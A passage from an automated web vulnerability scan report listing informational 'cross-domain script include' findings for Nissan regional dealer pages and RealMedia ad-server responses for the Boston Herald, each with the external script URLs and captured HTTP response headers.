<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.250. http://local.nissanusa.com/san-antonio-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/san-antonio-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=78201; expires=Sat, 05-Feb-2011 04:53:34 GMT; path=/
Set-Cookie: localDMA=san-antonio-area; expires=Sat, 05-Feb-2011 04:53:34 GMT; path=/
Content-Length: 106603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.251. http://local.nissanusa.com/san-diego-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/san-diego-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=92101; expires=Sat, 05-Feb-2011 04:56:59 GMT; path=/
Set-Cookie: localDMA=san-diego-area; expires=Sat, 05-Feb-2011 04:56:59 GMT; path=/
Content-Length: 138834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.252. http://local.nissanusa.com/san-francisco-oakland-san-jose-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/san-francisco-oakland-san-jose-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=94101; expires=Sat, 05-Feb-2011 04:56:51 GMT; path=/
Set-Cookie: localDMA=san-francisco-oakland-san-jose-area; expires=Sat, 05-Feb-2011 04:56:51 GMT; path=/
Content-Length: 130539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.253. http://local.nissanusa.com/seattle-tacoma-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/seattle-tacoma-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: downScroll=deleted; expires=Fri, 29-Jan-2010 04:57:23 GMT
Set-Cookie: localZIP=98101; expires=Sat, 05-Feb-2011 04:57:24 GMT; path=/
Set-Cookie: localDMA=seattle-tacoma-area; expires=Sat, 05-Feb-2011 04:57:24 GMT; path=/
Content-Length: 118363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.254. http://local.nissanusa.com/st-louis-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/st-louis-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=63101; expires=Sat, 05-Feb-2011 04:52:04 GMT; path=/
Set-Cookie: localDMA=st-louis-area; expires=Sat, 05-Feb-2011 04:52:04 GMT; path=/
Content-Length: 111818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.255. http://local.nissanusa.com/tampa-st-petersburg-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/tampa-st-petersburg-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=33601; expires=Sat, 05-Feb-2011 04:55:27 GMT; path=/
Set-Cookie: localDMA=tampa-st-petersburg-area; expires=Sat, 05-Feb-2011 04:55:27 GMT; path=/
Content-Length: 126968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.256. http://local.nissanusa.com/washington-dc-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/washington-dc-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=20001; expires=Sat, 05-Feb-2011 04:52:34 GMT; path=/
Set-Cookie: localDMA=washington-dc-area; expires=Sat, 05-Feb-2011 04:52:34 GMT; path=/
Content-Length: 156002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.257. http://local.nissanusa.com/wilkes-barre-scranton-pa-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/wilkes-barre-scranton-pa-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=18701; expires=Sat, 05-Feb-2011 04:53:14 GMT; path=/
Set-Cookie: localDMA=wilkes-barre-scranton-pa-area; expires=Sat, 05-Feb-2011 04:53:14 GMT; path=/
Content-Length: 165898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.258. http://network.realmedia.com/3/bostonherald/ros/728x90/jx/ss/a/L31@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/3/bostonherald/ros/728x90/jx/ss/a/L31@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://d3.zedo.com/jsc/d3/fo.js
http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31/L12&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:05:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1021
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:06:22 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31/L12&mm_flag="></script>
...[SNIP]...

18.259. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:27:11 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:18:14 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.260. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://d3.zedo.com/jsc/d3/fo.js
http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:35:41 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.261. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:46 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O1012Mr|O2016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:48 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.262. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:03 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:06 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.263. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://d3.zedo.com/jsc/d3/fo.js
http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:35:45 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.264. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:37 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O1016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:40 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.265. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://d3.zedo.com/jsc/d3/fo.js
http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:35:39 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.266. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:09 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:11 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.267. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://d3.zedo.com/jsc/d3/fo.js
http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
